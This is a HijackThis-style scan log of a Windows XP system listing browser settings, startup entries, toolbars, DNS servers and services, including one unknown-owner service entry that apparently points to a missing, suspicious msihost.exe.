R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
N3 - Netscape 7: user_pref("browser.startup.homepage", "http://my.yahoo.com/"); (C:\Documents and Settings\OWNER\Application Data\Mozilla\Profiles\default\k5ovwk4u.slt\prefs.js)
N3 - Netscape 7: user_pref("browser.search.defaultengine", "engine://C%3A%5CProgram%20Files%5CNetscape%5CNetscape%206%5Csearchplugins%5CSBWeb_01.src"); (C:\Documents and Settings\OWNER\Application Data\Mozilla\Profiles\default\k5ovwk4u.slt\prefs.js)
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O3 - Toolbar: (no name) - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - (no file)
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Weather] C:\Program Files\AWS\WeatherBug\Weather.exe 1
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\system32\msjava.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\system32\msjava.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O14 - IERESET.INF: START_PAGE_URL=http://www.fujitsupc.com/
O16 - DPF: {49232000-16E4-426C-A231-62846947304B} (SysData Class) - http://ipgweb.cce.hp.com/rdqnbk/downloads/sysinfo.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/micr...?1208885986764
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/micr...?1208885966835
O17 - HKLM\System\CCS\Services\Tcpip\..\{AE97C0FA-D1DE-417E-9A2E-0350D915C6C2}: NameServer = 1.1.2.108,151.164.1.8
O17 - HKLM\System\CCS\Services\Tcpip\..\{E1088878-FE6B-4281-8A84-1766D09E92D8}: NameServer = 151.164.11.201,151.164.1.8
O23 - Service: Ati HotKey Poller - Unknown owner - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: Sprint PCS v3 Utility Service - Sprint Spectrum, L.L.C - C:\Program Files\Sprint\Sprint PCS Connection Manager\CMSPCSUtilSvc.exe
O23 - Service: Symantec RemoteAssist - Symantec, Inc. - C:\Program Files\Common Files\Symantec Shared\Support Controls\ssrc.exe
O23 - Service: Windows MSI - Unknown owner - \\?\globalrootC:\WINDOWS\system32\msihost.exe (file missing)
--
End of file - 4667 bytes